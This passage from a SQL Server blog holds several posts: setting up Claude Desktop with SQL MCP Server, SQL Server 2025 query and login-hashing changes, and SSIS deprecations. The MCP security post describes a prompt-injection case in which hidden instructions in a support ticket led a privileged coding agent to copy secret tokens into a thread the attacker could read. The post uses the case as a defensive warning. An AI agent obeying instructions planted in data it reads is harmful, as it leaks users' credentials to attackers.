    "ccdScheduledTasksEnabled": true,
    "coworkScheduledTasksEnabled": false
  },
  "mcpServers": {
    "sql-mcp": {
      "command": "npx",
      "args": [
        "mcp-remote@latest",
        "http://localhost:5000/mcp",
        "--allow-http"
      ]
    }
  }
}

What this does: Claude Desktop expects MCP servers to communicate over stdio — a local process it launches itself. DAB uses HTTP. The mcp-remote package (run via npx, which ships with Node.js) bridges the two, and --allow-http tells it that an unencrypted local connection is acceptable — totally fine for a dev setup.

Save the file, then fully quit Claude Desktop. Closing the window isn't enough — it stays running in the background. Use Task Manager, find Claude, and End Task. Then relaunch it from the Start menu.

Once it's back up, click the + button at the bottom of the chat input, then click Connectors. You should see sql-mcp listed and enabled.

Ok. So how does it work?

Start a new chat in Claude Desktop and ask something simple, like 'How many customers do I have?'

Claude shows its processing notes, then the answer at the bottom. Response time? Just under 2 minutes for Claude to find my server, the Orders database, and the Customer table. Important note: DAB doesn't execute arbitrary SQL. It exposes typed CRUD operations against defined entities. There's no SELECT COUNT(*) happening. Claude is calling the read_records tool, paginating the results, and inferring the count from what comes back. For 500K rows with no query optimization on my side, under 2 minutes is not that bad.
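
To make that concrete, here's the count-by-pagination idea in Python. This is not DAB's or Claude's actual code; fetch_page is a hypothetical stand-in for a paged read_records call:

```python
# Illustration only: deriving a row count from a paged, read-only API
# when no COUNT aggregate is exposed. The agent keeps requesting pages
# and sums what comes back; a short page signals the end of the data.
def count_by_pagination(fetch_page, page_size=100):
    total, offset = 0, 0
    while True:
        rows = fetch_page(offset=offset, limit=page_size)
        total += len(rows)
        if len(rows) < page_size:  # short (or empty) page: we're done
            return total
        offset += page_size

# Simulate a 250-row table served in pages of 100
data = list(range(250))
pages = lambda offset, limit: data[offset:offset + limit]
print(count_by_pagination(pages))  # 250
```

Three round trips for 250 rows; 500K rows at a modest page size is thousands of round trips, which is exactly why my simple question took a couple of minutes.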

And that's it. The longer response time may be a trade-off for a controlled, auditable surface, but again, I did nothing to optimize the MCP call, and it ran on my local instance with limited memory and zero indexes. As with any SQL workload, design it deliberately. Think carefully about what you expose and how the agent will interact with it. Large tables with no natural filtering strategy will be slow. If you're building something real, consider exposing scoped views or stored procedures instead of raw tables, and isolate workloads by running AI-generated queries against a separate instance (or replica) to avoid unnecessary overhead. Lastly, use the --description flag to give the agent enough context to query intelligently. As I've tried to emphasize in my other sp_BlitzCache/AI posts, the AI is only as good as the data it's given. You need to help the AI do its job effectively.

What this setup actually is

This is a local development configuration. The DAB server runs on your machine, listens on localhost, and only Claude Desktop on that same machine can reach it. That's the right place to start learning the tool, but it's not how you'd deploy this for a customer. Production means containerizing DAB, deploying behind proper authentication, scoping a dedicated low-privilege login, and running over HTTPS. I covered the security concerns in the previous post — and all of that still applies here.

This post shows that the full path from a cold machine to Claude querying live data through a controlled MCP interface is achievable in a couple of hours. The tooling works and the configuration is straightforward. I believe this is a good starting point for anyone looking to understand SQL MCP Server as a bridge between AI and your SQL Server databases.

More to Read:

SQL MCP Server overview — Microsoft Learn
What is Data API Builder? — Microsoft Learn
DAB CLI reference — Microsoft Learn
SQL Server MCP: The Bridge Between Your Database and AI — sqlfingers.com

Monday, March 23, 2026

SQL Server 2025 OPPO: Better Plans. Less Duct Tape.

Parameter sniffing has been a recurring theme here lately. If you caught my sp_BlitzCache + AI series, you saw AI correctly diagnose parameter sniffing from a single output. SQL Server 2025 is now taking its own swing at parameter sniffing — automatically, at the engine level. Meet OPPO.

What Is OPPO?

OPPO stands for Optional Parameter Plan Optimization, and it ships in SQL Server 2025 as part of Intelligent Query Processing (IQP). It targets a specific and very common parameter sniffing pattern that has been painful for a long time — the optional parameter predicate. You've written this before:

SELECT *
FROM dbo.Orders
WHERE (CustomerID = @CustomerID OR @CustomerID IS NULL)
AND (StatusCode = @StatusCode OR @StatusCode IS NULL)

This pattern shows up everywhere — search screens, reporting stored procedures, anything that lets the user filter by one, some, or none of several columns. The problem is that the optimizer has always been forced to compile a single plan that works for both cases: when the parameter has a value (seek is right) and when it's NULL (scan is right). It can't do both well. Whichever value got cached first wins. Everything else loses.

OPPO solves this using the same Multiplan infrastructure introduced with Parameter Sensitive Plan Optimization (PSPO) in SQL Server 2022. Instead of a single cached plan, the optimizer now builds a dispatcher plan that evaluates the actual parameter value at runtime and routes to the appropriate query variant — seek when you've got a value, scan when you don't. The right plan for the right situation, automatically. Very nice.

How to Turn It On

OPPO is enabled by default when your database is at compatibility level 170, which is the default for SQL Server 2025. You don't have to do anything. If you want to be explicit about it, or you're managing compatibility levels carefully during an upgrade, here's the syntax:

ALTER DATABASE [YourDatabase] SET COMPATIBILITY_LEVEL = 170;
GO
ALTER DATABASE SCOPED CONFIGURATION SET OPTIONAL_PARAMETER_OPTIMIZATION = ON;
GO

Interestingly, unlike MAXDOP, FORCE ORDER, and other query-level hints, OPPO cannot be enabled at the query level. You can, however, disable it at the query level if you need to opt out a specific query. So it's all-or-nothing to turn on, but you can tell specific queries to ignore it:

SELECT *
FROM dbo.Orders
WHERE (CustomerID = @CustomerID OR @CustomerID IS NULL)
OPTION (USE HINT('DISABLE_OPTIONAL_PARAMETER_OPTIMIZATION'));

Note that OPPO and PSPO are independent of each other. Enabling one does not require the other.

The Part Nobody Is Talking About

Here is something I want to emphasize for you because the marketing language around IQP features may not accurately reflect the reality.

OPPO currently works cleanly when you have exactly one optional parameter. Brent Ozar tested this thoroughly — if you haven't read his writeup on OPPO, you should check it out — and his conclusion is blunt: OPPO helps if your query has exactly one, and only one, optional parameter. Any more than that, and it looks like we're still managing these ourselves. That's not a knock on the feature. It's the same story PSPO told when it shipped in 2022 — limited initial scope, promising foundation, gradual investment over time. OPPO looks like it's following the same trajectory.

The kitchen-sink stored procedure with six optional search parameters? The one that's been the bane of your existence for yeeeears? OPPO doesn't fully solve that yet. What it does solve is the simpler, single-parameter case, and it solves it automatically without code changes, plan guides, or OPTION (RECOMPILE) scattered everywhere.

That's not nothing. That's actually pretty good.

What This Means for Your Upgrade Decision

OPPO alone isn't a reason to upgrade to SQL Server 2025. But it is one more item in a growing list of query improvements that could collectively make a real difference for any environment plagued with parameter sniffing problems.

Here's what to actually do before and after you upgrade:

Before the upgrade

Run sp_BlitzCache against your current environment and pull your top queries by parameter sniffing complaints. Document what you find. If you've been following along here, you already know how to do this — and you know how to hand that output to an AI and get a plain-English diagnosis of what's wrong and why.

After moving to compatibility level 170

Run it again. Compare. You want to know which queries OPPO picked up, which ones PSPO is handling, and which ones are still on you. Query Store could be your friend here. Capture baselines before the compatibility level change, not after.

Watch for plan shifts

OPPO can cause plan shifts on queries that were previously stable. 'Better' is the intent, but 'different' is what you'll see first, and different requires validation. Test your workload under compatibility level 170 in a non-production environment before you cut over.

Don't assume the multi-parameter case is handled

If you have stored procedures with two or more optional parameters, verify OPPO is actually helping them — don't assume. The other workarounds that you've been using — dynamic SQL, OPTION (RECOMPILE), OPTIMIZE FOR — are all still valid and still necessary in those cases.

The Bigger Picture

What I find genuinely interesting about OPPO isn't just the feature itself — it's what it represents. For years, parameter sniffing diagnosis has required a DBA who knows what to look for, a tool like sp_BlitzCache to surface it, and enough experience to connect the symptom to the cause. We just spent six posts exploring how well AI can take that sp_BlitzCache output and walk through the diagnosis. Now the engine itself is starting to detect and route around certain classes of the problem before it ever becomes a symptom.

That's a meaningful shift. It does not replace the DBA, but it does mean that some of the lowest-hanging parameter sniffing fruit gets handled automatically, which frees you up to focus on the harder cases — the ones where the data distribution is genuinely complicated, the procedure design is the real problem, or the fix requires a rewrite rather than a hint.

SQL Server is getting smarter about query execution. Slowly, incrementally, version by version. OPPO is one more step in that direction. It's not finished, but it's definitely real.

More to Read

Optional Parameter Plan Optimization — Microsoft Learn
How SQL Server 2025's Optional Parameter Plan Optimization Works — Brent Ozar
Parameter Sensitive Plan Optimization — Microsoft Learn
sp_BlitzCache + ChatGPT: I'm Convinced — sqlfingers.com

Wednesday, March 18, 2026

SQL Server MCP: The Bridge Between Your Database and AI

AI is inside your SQL Server now. I don't mean that it's knocking or that it's on the horizon. It is already there. Microsoft calls it SQL MCP Server — their open-source solution for bringing AI agents directly into your data workflows. If you haven't heard of MCP yet, keep reading. If you've got developers in-house, there's a reasonable chance that it's already running in your environment and you should know about it.

What Is MCP

MCP stands for Model Context Protocol. Anthropic introduced it in late 2024 as an open standard for connecting AI agents to external tools and data sources. Think of it as a USB-C port for AI: a standard interface meant to solve the problem of every AI model needing its own custom connector for every data source.

Microsoft shipped SQL MCP Server as part of Data API Builder (DAB) version 1.7. When configured, the agent calls a defined, typed tool and the server executes a controlled operation against the entities you've explicitly configured, such as read_records, create_record, update_record and delete_record. No raw query generation. No credentials handed to a chatbot.
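
For the curious, here's roughly what one of those typed tool calls looks like on the wire. MCP rides on JSON-RPC 2.0, and the tools/call method is part of the protocol itself, but the arguments I pass here (entity name, row limit) are illustrative assumptions; the real contract is whatever tool schema the server advertises:

```python
import json

# Sketch of an MCP tool invocation as it travels between client and
# server. The envelope is JSON-RPC 2.0 per the MCP spec; the
# "arguments" payload below is a hypothetical shape, not DAB's
# documented contract.
request = {
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {
        "name": "read_records",
        "arguments": {"entity": "Customer", "first": 10},
    },
}
wire = json.dumps(request)
print(wire)
```

The point: the agent never sends SQL. It names a tool and supplies arguments, and the server decides what controlled operation that maps to.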

By plugging your SQL Server into an MCP port, the AI stops guessing what your data looks like and starts interacting with it in real-time. Yes. I said real-time. The MCP turns your AI from a chatbot that's just talking into a virtual DBA that actually works across your live data. It’s like giving AI its own connection string and a read-only — or write-ready — seat at the table.

That agent configuration is key. You define what is exposed and you set the permissions. This gives AI a controlled surface rather than a wide-open door.

A Good Example

Your client's helpdesk team spends twenty minutes every day copying order status details from SSMS into emails. You set up the SQL MCP Server, expose the Orders and Customers views with read-only permissions for the helpdesk role, and connect it to GitHub Copilot. Now the helpdesk user types: 'Show me all open orders for Acme Corp placed in the last 30 days' — and receives a formatted result in seconds, without touching SSMS or knowing a line of T-SQL, and without having access to anything outside those two views. You've built a controlled and very manageable bridge between AI and your data layer that can be used with natural language to query data and output the desired resultset.

A Dangerous Example

A developer on your team is testing an AI coding agent. They want to query the database while developing, so they point it at SQL Server using their own administrator account, and they expose all tables 'just to keep it simple'. An MCP setup built on an over-privileged account inherits classic SQL-injection risks, which can escalate into full data destruction or exfiltration.

This isn't a hypothetical pattern. In July 2025, researchers at General Analysis documented a real attack scenario involving Supabase's MCP implementation. A developer was using Cursor — an AI coding agent — connected to their Supabase database via MCP with a privileged service_role key, which bypassed all row-level security by design. An attacker filed a support ticket containing hidden instructions embedded in the ticket text. When the developer asked the agent to review the latest open tickets, the agent read the attacker's message and interpreted the embedded instructions as commands — querying the private integration_tokens table and writing the contents back into the support ticket thread. The attacker refreshed the ticket and read their targets' credentials in plain text. The database executed every query correctly. It had no way to know the request came from a compromised agent rather than an authorized service. Too much access + Untrusted input = Accident waiting to happen.

What's Already Out There

Erik Darling's free SQL Server Performance Monitor shipped in February 2026 with a built-in MCP server. Enable it in settings, connect any MCP-compatible AI client, and ask natural language questions about CPU, waits, blocking, and query performance against your own collected monitoring data. Erik uses Claude, but the MCP server works with any LLM that supports the protocol. This is the lowest-risk, highest-value starting point for any DBA curious about what MCP actually feels like in practice.

Google launched managed MCP servers for Cloud SQL — including SQL Server — in early 2026. Microsoft has its own path through DAB. Both major cloud vendors are shipping this in production. It is not a preview feature anymore.

What You Need to Think About

Scope the permissions like your job depends on it.

Because it might. Microsoft's own security guidance on MCP flags over-permissioned servers as a primary risk. An MCP server should have access scoped exactly to what the agent needs. Nothing more. Specific entities, read-only wherever possible, a dedicated low-privilege login. Not a sysadmin. Not a service account recycled from something else. A purpose-built login with the minimum access to do the job.

Untrusted data in, bad instructions out.

If your AI agent reads from a table that users can write to, an attacker writing to that table could influence what the agent does next. This is called prompt injection, ranked as the number-one security risk for LLM applications by OWASP. It's an architectural vulnerability that lets attackers bypass AI safety guardrails. Keep AI agents away from data sources that mix trusted operations with untrusted user input.

Find out what's already running.

MCP is easy to set up. That's a feature and a risk. Before implementing, you should audit what your developers are already running. A developer who found a GitHub repo with an MSSQL MCP server config and a five-minute setup guide may already have something pointed at a dev database — and dev databases contain production data more often than people admit.

Know where the data goes.

When your AI tool processes a query result, that result travels to wherever the model is running. If you're using a cloud-hosted LLM like Anthropic, OpenAI or Google, your query results are leaving your network. For monitoring or diagnostics data, this is probably acceptable. For customer data, financial records, or anything regulated, your legal team will have opinions about this.

So, Should You Set It Up?

For monitoring and diagnostics, yes. Erik Darling's Performance Monitor is the right first step — self-contained, read-only against monitoring data, nothing leaves your network. Low risk. Immediately useful. A good way to see what AI + SQL Server MCP actually feels like before committing to anything bigger.

For exposing production application data to AI agents, treat it like any other integration project: defined scope, purpose-built service account, explicit entity configuration, and a conversation with whoever manages your security. The technology is ready. The governance discussion in most shops hasn't happened yet.

Coming Up

In the next post, I'll walk through setting up the SQL MCP Server locally using Data API Builder — from a working dab-config.json to a live connection with an AI client — so you can see exactly what a controlled, scoped MCP setup looks like in practice.

More to Read:

SQL MCP Server Overview — Microsoft Learn
Free SQL Server Performance Monitoring — Erik Darling
Understanding and Mitigating Security Risks in MCP Implementations — Microsoft Community Hub
Managed MCP Servers for Google Cloud Databases — Google Cloud Blog

Tuesday, March 17, 2026

SSIS Is Not Dead. Yet.

SSRS is gone. SQL Server 2025 shipped without it — the first version to drop SSRS entirely, with Power BI Report Server (PBIRS) as the named replacement. But what about SSIS?

There is no EOL yet, but the signals are clear. SSIS is being phased out in favor of Microsoft Fabric, which is positioned as the next-generation unified analytics platform. Look at that. They don't even call it 'ETL' anymore. Again, it's not gone yet, but Microsoft is encouraging the modernization of ETL workloads to Fabric to address the limitations of on-premises SSIS infrastructure, such as limited scalability and high maintenance overhead.

We've been here before. DTS became SSIS with SQL Server 2005 — Yukon, for those of us who were there. I was. [Thank you, Donald Farmer!] The transition wasn't a cliff either. It was deprecation notices, a long runway, and then one day DTS was just gone. The difference this time is that the runway leads to the cloud.

SSIS 2025 Shipped. Read the Fine Print.

SSIS 2025 is generally available, bundled with SQL Server 2025. Microsoft announced it at Ignite in November 2025 within the Microsoft Fabric Blog, not the SQL Server blog. That's not an accident.

Here's what shipped with SSIS 2025 — the full picture, not just the press release version.

The one new feature:

The ADO.NET connection manager now supports the Microsoft SqlClient Data Provider, with Microsoft Entra ID authentication and TLS 1.3 support. That's it. One new feature in the entire release.

What's deprecated:

Legacy Integration Services Service — the service that lets SSMS monitor packages stored in the SSIS Package Store or msdb. Not a big deal if you've migrated to the SSIS Catalog (SSISDB), but if you're still on the package deployment model, this will matter.

32-bit execution mode. SSMS 21 and SSIS Projects 2022 are 64-bit only going forward. If you have custom or third-party components that are 32-bit only, they break.

SqlClient Data Provider (SDS) connection type. The recommendation is to migrate to the ADO.NET connection type.

What's been removed entirely:

CDC components by Attunity and CDC service for Oracle by Attunity — gone. If you're using these for change data capture from Oracle, you need a replacement. Now.

Microsoft Connector for Oracle — also gone. Support ended July 2025. Not available in SQL Server 2025 onward.

Hadoop components — Hadoop Hive Task, Hadoop Pig Task, Hadoop File System Task — removed.

The breaking change nobody talks about:

The Microsoft.SqlServer.Management.IntegrationServices assembly now depends on Microsoft.Data.SqlClient instead of System.Data.SqlClient. If you have PowerShell scripts, C# automation, or deployment tooling that instantiates the IntegrationServices object, those scripts will break without updates. This one is quiet, easy to miss, and will bite you during your first post-upgrade deployment.

Where Microsoft Is Pointing

The official migration path is Microsoft Fabric Data Factory. SSIS lift-and-shift in Fabric is currently in private preview. That is the ability to run existing SSIS packages inside a Fabric workspace without rewriting them. Microsoft's framing is 'bridge, not cliff,' and that's fair. But a bridge going one direction is still a one-way bridge.

For what it's worth, SQL Server 2022 extended support runs to January 11, 2033, and SSIS goes with it. But that's seven years, not forever, and migrations of complex SSIS estates take longer than people expect.

What You Should Actually Do Right Now

Nobody is forcing you off SSIS today, but here's what's worth doing now, before anything becomes urgent:

Know what you have.

Inventory your SSIS packages. How many are there? Where are they deployed — SSIS Catalog, msdb, file system? Which ones use Oracle connectors, CDC components, or 32-bit custom components? If you can't answer those questions, you can't plan.

Check your automation scripts.

If anything in your environment uses Microsoft.SqlServer.Management.IntegrationServices — PowerShell deployment scripts, CI/CD pipelines, custom monitoring — verify it's referencing Microsoft.Data.SqlClient before you upgrade to SQL Server 2025. This is the most likely silent failure on upgrade day.
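
If you want a quick inventory pass before upgrade day, a script along these lines can flag candidates. This is a hedged sketch: the file extensions and search patterns are my assumptions, so adapt them to how your shop stores its deployment tooling:

```python
import os

# Minimal audit sketch: walk a scripts folder and flag files that still
# reference the old SqlClient provider or the IntegrationServices
# assembly, both of which change behavior under SQL Server 2025.
PATTERNS = ("System.Data.SqlClient",
            "Microsoft.SqlServer.Management.IntegrationServices")

def find_references(root):
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            # Extensions are an assumption; add whatever your shop uses.
            if not name.lower().endswith((".ps1", ".psm1", ".cs", ".csx")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="ignore") as f:
                    text = f.read()
            except OSError:
                continue
            for pattern in PATTERNS:
                if pattern in text:
                    hits.append((path, pattern))
    return hits

# Usage (hypothetical path):
# for path, pattern in find_references(r"C:\deploy-scripts"):
#     print(path, "->", pattern)
```

Anything this flags deserves a manual look before you upgrade, since these are exactly the quiet breakages described above.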

Identify your Oracle-dependent packages.

The Microsoft Connector for Oracle is gone in SSIS 2025. If you're upgrading SQL Server and you have packages using that connector, they will not work. Third-party alternatives exist — ADO.NET components, KingswaySoft, and others — but you need to know which packages are affected before upgrade day, not after.

Don't migrate to Fabric yet just because Microsoft says to.

Fabric Data Factory is a genuinely different product. It's cloud-native, SaaS, and not a drop-in replacement for on-premises SSIS. The lift-and-shift option in private preview is promising, but it's still preview. For production ETL workloads, 'let's move to Fabric' is a project, not a setting. Treat it that way.

So, Is SSIS Next?

Brent Ozar asked this question in June 2025. The community answered the SSRS half loudly. The SSIS half got quiet. Here's my answer.

No EOL date has been announced. SSIS 2025 shipped, which means Microsoft is still investing in it — just barely, and clearly with both eyes on Fabric. The trajectory is obvious even if the timeline isn't. SSRS got a clean announcement and a named replacement. SSIS is getting a slower walk toward the exit, with a Fabric-shaped door at the end of the hallway.

I think Brent put it well in his comments: without a fully on-premises replacement for SSIS, Microsoft can't make a clean announcement the way they did with SSRS. The closest thing on-premise shops have is a self-hosted integration runtime — but the control still depends on the cloud.

For now: don't panic, do inventory, review your automation scripts, and watch what happens with SSIS lift-and-shift in Fabric once it goes GA. That's when the real Fabric migration conversation starts. Let me know how I can help.

More to Read:

What's New in Integration Services in SQL Server 2025 — Microsoft Learn
The Evolution of SSIS: SSIS 2025 Generally Available — Microsoft Fabric Blog
SSIS Microsoft Connector for Oracle Deprecation — Microsoft SQL Server Blog
SQL Server 2022 Lifecycle — Microsoft Learn

Monday, March 16, 2026

SQL Server 2025 Slowed Down Your Logins. Intentionally.

You upgraded to SQL Server 2025. Your SQL auth logins are slower. This is not a bug. Microsoft did this on purpose — which is actually good news, but if you're not using connection pooling, it's not going to feel very good.

What Changed

Prior to SQL Server 2025, SQL login passwords were hashed using SHA-512 with a random salt — one pass. Fast to verify, which is exactly what attackers love.

SQL Server 2025 switches to PBKDF2 (RFC 2898) as the default hashing algorithm. Same SHA-512 underneath, but now the password is hashed 100,000 times in a loop. This is the standard recommended by NIST SP 800-63B for password-based authentication, and Microsoft confirms it in their SQL Server 2025 security overview.
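
You can feel that work factor yourself with Python's standard library, which implements the same PBKDF2/SHA-512 construction. To be clear, this illustrates the algorithm's cost only; the salt handling and output format here are not SQL Server's exact internal storage format:

```python
import hashlib
import os
import time

# PBKDF2 with SHA-512, the same construction SQL Server 2025 uses for
# login hashes. The 100,000 iteration count matches the post; the salt
# here is illustrative, not SQL Server's internal format.
salt = os.urandom(16)

t0 = time.perf_counter()
one_pass = hashlib.pbkdf2_hmac("sha512", b"MyPassword123", salt, 1)
t1 = time.perf_counter()
many_pass = hashlib.pbkdf2_hmac("sha512", b"MyPassword123", salt, 100_000)
t2 = time.perf_counter()

print(f"1 iteration:        {(t1 - t0) * 1000:.3f} ms")
print(f"100,000 iterations: {(t2 - t1) * 1000:.1f} ms")
```

The single-pass call is effectively free; the 100,000-iteration call takes a human-noticeable chunk of a second on ordinary hardware. That gap is the entire point of the design.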

You can see the difference in the hash itself. Run this on both versions:

SELECT PWDENCRYPT('MyPassword123');

Pre-2025 hashes start with 0x0200. SQL Server 2025 hashes start with 0x0300. That version byte tells you what you've got. Same function. Completely different work going on behind the scenes.

How to Measure the Impact

The key here is to pre-generate the hash first, then time only the verification step to mimic what's actually happening at login.

-- Step 1: pre-generate the hash (not timed)
DECLARE @hash VARBINARY(256) = PWDENCRYPT('MyPassword123');

-- Step 2: time only the verification
DECLARE @start DATETIME2 = SYSDATETIME();

SELECT PWDCOMPARE('MyPassword123', @hash) AS PasswordMatch;

SELECT DATEDIFF(MILLISECOND, @start, SYSDATETIME()) AS ElapsedMs;

No special permissions required — any login that can connect and run a basic SELECT can run this. And the password you pass in is just a string; it has nothing to do with your own login or any existing account on the instance.

Run it on SQL Server 2022 first, then 2025. The difference is immediate. On 2022, you'll see 0ms — single-pass SHA-512 is too fast for millisecond precision to capture. On 2025, the result is hardware-dependent. PBKDF2 is intentionally single-threaded and CPU-bound, so your number will reflect your server's single-core performance. VladDBA measured approximately 150ms on his test environment. On my 2025 instance, I got 229ms. Your number will be your number — run it and find out.

Sample elapsed times by version:
SQL Server 2012–2022: SHA-512 + salt, 1 iteration, 0ms
SQL Server 2025 (VladDBA): PBKDF2 / SHA-512, 100,000 iterations, ~150ms
SQL Server 2025 (sqlfingers): PBKDF2 / SHA-512, 100,000 iterations, ~229ms

But Here's the Other Side

That overhead isn't Microsoft being careless. It's intentional friction — and it hits attackers far harder than it hits your app.

VladDBA ran the numbers on password brute-forcing. On SQL Server 2022, a password audit script cracked a set of hashes in about 45 seconds. On SQL Server 2025 with PBKDF2, the same workload is estimated at 154,008 seconds — roughly 42 hours. Same hardware, same wordlist. The only difference is the hash algorithm. That is not a small point.
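
Quick sanity math on those published numbers:

```python
# Figures from VladDBA's test as cited above: same hardware, same
# wordlist, only the hash algorithm changed between runs.
crack_2022_seconds = 45
crack_2025_seconds = 154_008

slowdown = crack_2025_seconds / crack_2022_seconds
print(f"{slowdown:,.0f}x slower to crack")
print(f"{crack_2025_seconds / 3600:.1f} hours")
```

Roughly a 3,400x slowdown for the attacker, bought with a couple hundred milliseconds per legitimate login. That's the trade Microsoft made, and it's a defensible one.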

Microsoft acknowledges the login latency tradeoff directly on the SQL Server 2025 Known Issues page. They call it out, they're not hiding it.

What You Should Do

Check whether your applications are using connection pooling. If they are, the per-login overhead happens once per pool connection establishment, not on every request — and you're probably going to be fine. If they're not pooling, or if you're running scripts, jobs, or monitoring tools that open a fresh SQL auth connection on every execution, this IS going to surface. Without question.

Existing logins migrate automatically on first successful authentication.

SQL logins created before the upgrade retain their 0x0200 hash until they authenticate for the first time against the upgraded instance. At that point, SQL Server silently rehashes the password under PBKDF2 and stores the new 0x0300 hash going forward. This works because authentication is the only moment SQL Server has access to the plaintext password. Any login that never authenticates post-upgrade will retain its old hash indefinitely. If you want to confirm which logins are still on the old algorithm, check the hash header in sys.sql_logins:

SELECT name,
       CONVERT(VARBINARY(2), password_hash) AS HashVersion
FROM   sys.sql_logins
WHERE  type = 'S'
AND    password_hash IS NOT NULL;

0x0200 = old. 0x0300 = PBKDF2. Simple as that.
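
If you'd rather post-process that result set outside of T-SQL, the same header check is trivial anywhere. A small sketch in Python; the 0x0200/0x0300 header values come from the behavior described above, and the function name is mine:

```python
# Classify a SQL login password hash by its two-byte version header:
# 0x0200 = legacy salted SHA-512, 0x0300 = PBKDF2 (SQL Server 2025).
def hash_algorithm(password_hash: bytes) -> str:
    header = password_hash[:2]
    if header == b"\x02\x00":
        return "SHA-512 (legacy)"
    if header == b"\x03\x00":
        return "PBKDF2"
    return "unknown"

print(hash_algorithm(bytes.fromhex("0300AB12")))  # PBKDF2
```

Feed it the password_hash bytes exported from sys.sql_logins and you have an instant migration report of which logins still need to authenticate once post-upgrade.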

Kerberos and Windows auth are unaffected.

This only applies to SQL authentication. If your environment uses Windows auth or Kerberos throughout, none of this touches you.

There's an undocumented trace flag.

Community discussion on Microsoft Learn surfaced startup parameter -T4671 as a way to revert to pre-2025 hashing behavior. Note that TF 4671 reversed meaning between versions — in SQL Server 2022 it enabled iterative hashing; in 2025 it appears to disable it. This is undocumented and unsupported. I'm mentioning it because you'll see it discussed, not because I'm recommending it.

More to Read:

SQL Server 2025 Known Issues — Microsoft Learn
Secure by Default: What's New in SQL Server 2025 Security — Microsoft Community Hub
Looking into SQL Server 2025's new PBKDF2 hashing algorithm — VladDBA
NIST SP 800-63B Digital Identity Guidelines